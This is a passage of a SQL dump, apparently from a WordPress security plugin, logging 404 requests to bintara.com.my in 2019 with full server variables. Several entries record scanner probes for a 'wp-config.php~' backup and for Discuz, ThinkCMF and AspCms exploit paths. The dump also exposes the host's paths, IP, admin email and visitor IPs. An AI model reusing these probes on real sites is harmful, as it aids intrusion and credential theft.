:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523219.1246\";s:12:\"REQUEST_TIME\";s:10:\"1569523219\";}}','notice','2019-09-26 18:40:20','2019-09-26 18:40:19',35177136,36983000,'https://bintara.com.my/rdpl.php',1,0,'104.218.63.75'),(27375,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"1B4A50A8-DA04-4003-B549-3B4A5BD58F4E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKhLn8O70Y-6jRKSqTHnwAAAY0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"49801\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKhLn8O70Y-6jRKSqTHnwAAAY0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569890606.9296\";s:12:\"REQUEST_TIME\";s:10:\"1569890606\";}}','notice','2019-10-01 00:43:29','2019-10-01 00:43:27',35498248,37297728,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27374,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"53612\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKSmxhRvBce6cZZqh4JrQAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569886875.6019\";s:12:\"REQUEST_TIME\";s:10:\"1569886875\";}}','notice','2019-09-30 23:41:18','2019-09-30 23:41:16',35523080,37321040,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27373,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"64313\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKBZX8O70Y-6jRKSqS@VAAAAYQ\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569882469.5909\";s:12:\"REQUEST_TIME\";s:10:\"1569882469\";}}','notice','2019-09-30 22:27:52','2019-09-30 22:27:50',35882920,37690232,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'178.156.202.83'),(27372,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZKBXEStyRh4VKWYYQ4M4AAAAU8\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKBXEStyRh4VKWYYQ4M4AAAAU8\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"59497\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKBXEStyRh4VKWYYQ4M4AAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569882460.3515\";s:12:\"REQUEST_TIME\";s:10:\"1569882460\";}}','notice','2019-09-30 22:27:42','2019-09-30 22:27:40',35519136,37314976,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'178.156.202.83'),(27371,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKBVUStyRh4VKWYYQ4M2wAAAVU\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"56071\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKBVUStyRh4VKWYYQ4M2wAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569882453.4069\";s:12:\"REQUEST_TIME\";s:10:\"1569882453\";}}','notice','2019-09-30 22:27:35','2019-09-30 22:27:33',35490144,37286152,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.83'),(27370,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:105:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.9.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"14.162.146.128\";s:11:\"REMOTE_PORT\";s:5:\"34615\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZJHsBhRvBce6cZZqh4DwQAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569867696.4641\";s:12:\"REQUEST_TIME\";s:10:\"1569867696\";}}','notice','2019-09-30 18:21:39','2019-09-30 18:21:36',35520536,37323312,'https://bintara.com.my/?page_id=18',1,0,'14.162.146.128'),(27369,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZI7lEStyRh4VKWYYQ7puwAAAUY\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZI7lEStyRh4VKWYYQ7puwAAAUY\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"55427\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZI7lEStyRh4VKWYYQ7puwAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569864596.3638\";s:12:\"REQUEST_TIME\";s:10:\"1569864596\";}}','notice','2019-09-30 17:29:59','2019-09-30 17:29:56',35517504,37316248,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'178.156.202.82'),(27368,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZI7h0StyRh4VKWYYQ7ptgAAAUA\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"65015\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZI7h0StyRh4VKWYYQ7ptgAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569864583.6315\";s:12:\"REQUEST_TIME\";s:10:\"1569864583\";}}','notice','2019-09-30 17:29:49','2019-09-30 17:29:44',33618248,35407152,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.82'),(27347,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.php~\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQiY3U6542i46IOG7AcQAAAFc\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQiY3U6542i46IOG7AcQAAAFc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"11980\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\"